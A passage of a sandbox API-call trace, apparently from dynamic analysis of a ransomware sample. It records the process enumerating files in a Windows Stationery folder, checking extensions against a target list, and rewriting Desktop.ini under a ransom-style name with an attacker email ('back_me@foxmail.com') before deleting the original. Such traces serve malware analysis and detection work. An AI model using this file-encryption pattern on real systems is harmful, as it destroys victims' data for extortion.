Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0043.283] lstrlenW (lpString=".zip") returned 4 [0043.283] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0043.283] lstrlenW (lpString=".rar") returned 4 [0043.283] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0043.283] lstrlenW (lpString=".bz2") returned 4 [0043.283] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0043.283] lstrlenW (lpString=".7z") returned 3 [0043.283] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0043.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0043.283] lstrlenW (lpString=".dbf") returned 4 [0043.283] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0043.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0043.283] lstrlenW (lpString=".1cd") returned 4 [0043.284] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0043.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0043.284] lstrlenW (lpString=".jpg") returned 4 [0043.284] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0043.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0043.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0043.284] lstrlenW (lpString=".doc") returned 4 [0043.284] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0043.284] lstrlenW (lpString=".docx") returned 5 [0043.284] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0043.284] lstrlenW (lpString=".pdf") returned 4 [0043.284] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0043.284] lstrlenW (lpString=".xls") returned 4 [0043.284] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0043.284] lstrlenW (lpString=".xlsx") returned 5 [0043.284] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0043.284] lstrlenW (lpString=".ppt") returned 4 [0043.284] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0043.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0043.284] lstrlenW (lpString=".zip") returned 4 [0043.284] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0043.284] lstrlenW (lpString=".rar") returned 4 [0043.284] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0043.284] lstrlenW (lpString=".bz2") returned 4 [0043.284] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0043.284] lstrlenW (lpString=".7z") returned 3 [0043.284] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0043.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0043.284] lstrlenW (lpString=".dbf") returned 4 [0043.284] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0043.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0043.284] lstrlenW (lpString=".1cd") returned 4 [0043.284] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0043.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0043.285] lstrlenW (lpString=".jpg") returned 4 [0043.285] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0043.285] lstrcmpiW (lpString1=".jpg", lpString2=".php") returned -1 [0043.285] lstrlenW (lpString="Blue_Gradient.jpg") returned 17 [0043.285] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.286] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2575) returned 1 [0043.286] CloseHandle (hObject=0x214) returned 1 [0043.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg")) returned 0x20 [0043.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0043.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0043.286] lstrlenW (lpString=".doc") returned 4 [0043.286] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0043.286] lstrlenW (lpString=".docx") returned 5 [0043.286] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0043.286] lstrlenW (lpString=".pdf") returned 4 [0043.286] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0043.286] lstrlenW (lpString=".xls") returned 4 [0043.286] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0043.286] lstrlenW (lpString=".xlsx") returned 5 [0043.286] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0043.286] lstrlenW (lpString=".ppt") returned 4 [0043.286] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0043.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0043.286] lstrlenW (lpString=".zip") returned 4 [0043.287] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0043.287] lstrlenW (lpString=".rar") returned 4 [0043.287] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0043.287] lstrlenW (lpString=".bz2") returned 4 [0043.287] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0043.287] lstrlenW (lpString=".7z") returned 3 [0043.287] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0043.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0043.287] lstrlenW (lpString=".dbf") returned 4 [0043.287] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0043.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0043.287] lstrlenW (lpString=".1cd") returned 4 [0043.287] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0043.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0043.287] lstrlenW (lpString=".jpg") returned 4 [0043.287] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0043.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0043.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0043.287] lstrlenW (lpString=".doc") returned 4 [0043.287] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0043.287] lstrlenW (lpString=".docx") returned 5 [0043.287] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0043.287] lstrlenW (lpString=".pdf") returned 4 [0043.287] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0043.287] lstrlenW (lpString=".xls") returned 4 [0043.287] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0043.287] lstrlenW (lpString=".xlsx") returned 5 [0043.287] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0043.287] lstrlenW (lpString=".ppt") returned 4 [0043.287] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0043.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0043.287] lstrlenW (lpString=".zip") returned 4 [0043.287] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0043.287] lstrlenW (lpString=".rar") returned 4 [0043.288] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0043.288] lstrlenW (lpString=".bz2") returned 4 [0043.288] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0043.288] lstrlenW (lpString=".7z") returned 3 [0043.288] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0043.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0043.288] lstrlenW (lpString=".dbf") returned 4 [0043.288] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0043.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0043.288] lstrlenW (lpString=".1cd") returned 4 [0043.288] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0043.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0043.288] lstrlenW (lpString=".jpg") returned 4 [0043.288] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0043.288] lstrcmpiW (lpString1=".gif", lpString2=".php") returned -1 [0043.288] lstrlenW (lpString="Cave_Drawings.gif") returned 17 [0043.288] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.288] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=4587) returned 1 [0043.288] CloseHandle (hObject=0x214) returned 1 [0043.288] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif")) returned 0x20 [0043.289] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.289] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0043.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0043.289] lstrlenW (lpString=".doc") returned 4 [0043.289] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0043.289] lstrlenW (lpString=".docx") returned 5 [0043.289] lstrcmpiW (lpString1=".docx", lpString2="s.gif") returned -1 [0043.289] lstrlenW (lpString=".pdf") returned 4 [0043.289] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0043.289] lstrlenW (lpString=".xls") returned 4 [0043.289] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0043.289] lstrlenW (lpString=".xlsx") returned 5 [0043.289] lstrcmpiW (lpString1=".xlsx", lpString2="s.gif") returned -1 [0043.289] lstrlenW (lpString=".ppt") returned 4 [0043.289] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0043.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0043.289] lstrlenW (lpString=".zip") returned 4 [0043.289] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0043.289] lstrlenW (lpString=".rar") returned 4 [0043.289] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0043.289] lstrlenW (lpString=".bz2") returned 4 [0043.289] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0043.289] lstrlenW (lpString=".7z") returned 3 [0043.289] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0043.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0043.289] lstrlenW (lpString=".dbf") returned 4 [0043.289] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0043.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0043.289] lstrlenW (lpString=".1cd") returned 4 [0043.289] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0043.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0043.290] lstrlenW (lpString=".jpg") returned 4 [0043.290] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0043.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0043.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0043.290] lstrlenW (lpString=".doc") returned 4 [0043.290] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0043.290] lstrlenW (lpString=".docx") returned 5 [0043.290] lstrcmpiW (lpString1=".docx", lpString2="s.gif") returned -1 [0043.290] lstrlenW (lpString=".pdf") returned 4 [0043.290] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0043.290] lstrlenW (lpString=".xls") returned 4 [0043.290] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0043.290] lstrlenW (lpString=".xlsx") returned 5 [0043.290] lstrcmpiW (lpString1=".xlsx", lpString2="s.gif") returned -1 [0043.290] lstrlenW (lpString=".ppt") returned 4 [0043.290] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0043.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0043.290] lstrlenW (lpString=".zip") returned 4 [0043.290] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0043.290] lstrlenW (lpString=".rar") returned 4 [0043.290] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0043.290] lstrlenW (lpString=".bz2") returned 4 [0043.290] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0043.290] lstrlenW (lpString=".7z") returned 3 [0043.290] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0043.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0043.290] lstrlenW (lpString=".dbf") returned 4 [0043.290] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0043.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0043.290] lstrlenW (lpString=".1cd") returned 4 [0043.290] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0043.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0043.290] lstrlenW (lpString=".jpg") returned 4 [0043.291] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0043.291] lstrcmpiW (lpString1=".gif", lpString2=".php") returned -1 [0043.291] lstrlenW (lpString="Connectivity.gif") returned 16 [0043.291] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.291] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2319) returned 1 [0043.291] CloseHandle (hObject=0x214) returned 1 [0043.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif")) returned 0x20 [0043.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.291] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0043.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0043.291] lstrlenW (lpString=".doc") returned 4 [0043.291] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0043.291] lstrlenW (lpString=".docx") returned 5 [0043.291] lstrcmpiW (lpString1=".docx", lpString2="y.gif") returned -1 [0043.291] lstrlenW (lpString=".pdf") returned 4 [0043.292] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0043.292] lstrlenW (lpString=".xls") returned 4 [0043.292] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0043.292] lstrlenW (lpString=".xlsx") returned 5 [0043.292] lstrcmpiW (lpString1=".xlsx", lpString2="y.gif") returned -1 [0043.292] lstrlenW (lpString=".ppt") returned 4 [0043.292] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0043.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0043.292] lstrlenW (lpString=".zip") returned 4 [0043.292] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0043.292] lstrlenW (lpString=".rar") returned 4 [0043.292] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0043.292] lstrlenW (lpString=".bz2") returned 4 [0043.292] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0043.292] lstrlenW (lpString=".7z") returned 3 [0043.292] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0043.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0043.292] lstrlenW (lpString=".dbf") returned 4 [0043.292] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0043.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0043.292] lstrlenW (lpString=".1cd") returned 4 [0043.292] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0043.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0043.292] lstrlenW (lpString=".jpg") returned 4 [0043.292] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0043.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0043.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0043.292] lstrlenW (lpString=".doc") returned 4 [0043.292] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0043.292] lstrlenW (lpString=".docx") returned 5 [0043.292] lstrcmpiW (lpString1=".docx", lpString2="y.gif") returned -1 [0043.292] lstrlenW (lpString=".pdf") returned 4 [0043.292] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0043.293] lstrlenW (lpString=".xls") returned 4 [0043.293] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0043.293] lstrlenW (lpString=".xlsx") returned 5 [0043.293] lstrcmpiW (lpString1=".xlsx", lpString2="y.gif") returned -1 [0043.293] lstrlenW (lpString=".ppt") returned 4 [0043.293] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0043.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0043.293] lstrlenW (lpString=".zip") returned 4 [0043.293] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0043.293] lstrlenW (lpString=".rar") returned 4 [0043.293] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0043.293] lstrlenW (lpString=".bz2") returned 4 [0043.293] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0043.293] lstrlenW (lpString=".7z") returned 3 [0043.293] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0043.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0043.293] lstrlenW (lpString=".dbf") returned 4 [0043.293] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0043.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0043.293] lstrlenW (lpString=".1cd") returned 4 [0043.293] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0043.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0043.293] lstrlenW (lpString=".jpg") returned 4 [0043.293] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0043.293] lstrcmpiW (lpString1=".ini", lpString2=".php") returned -1 [0043.293] lstrlenW (lpString="Desktop.ini") returned 11 [0043.293] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.294] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=645) returned 1 [0043.294] CloseHandle (hObject=0x214) returned 1 [0043.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 0x26 [0043.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.294] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.294] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0043.295] GetLastError () returned 0x0 [0043.295] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x285, lpOverlapped=0x0) returned 1 [0043.296] WriteFile (in: hFile=0x200, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x290, lpOverlapped=0x0) returned 1 [0043.298] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.298] WriteFile (in: hFile=0x200, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.298] SetEndOfFile (hFile=0x200) returned 1 [0043.298] CloseHandle (hObject=0x200) returned 1 [0043.299] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.299] SetEndOfFile (hFile=0x214) returned 1 [0043.299] CloseHandle (hObject=0x214) returned 1 [0043.299] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x26) returned 1 [0043.300] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 1 [0043.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0043.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0043.300] lstrlenW (lpString=".doc") returned 4 [0043.300] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0043.300] lstrlenW (lpString=".docx") returned 5 [0043.300] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0043.300] lstrlenW (lpString=".pdf") returned 4 [0043.300] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0043.300] lstrlenW (lpString=".xls") returned 4 [0043.300] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0043.300] lstrlenW (lpString=".xlsx") returned 5 [0043.300] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0043.300] lstrlenW (lpString=".ppt") returned 4 [0043.300] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0043.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0043.300] lstrlenW (lpString=".zip") returned 4 [0043.300] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0043.300] lstrlenW (lpString=".rar") returned 4 [0043.300] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0043.300] lstrlenW (lpString=".bz2") returned 4 [0043.300] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0043.300] lstrlenW (lpString=".7z") returned 3 [0043.301] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0043.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 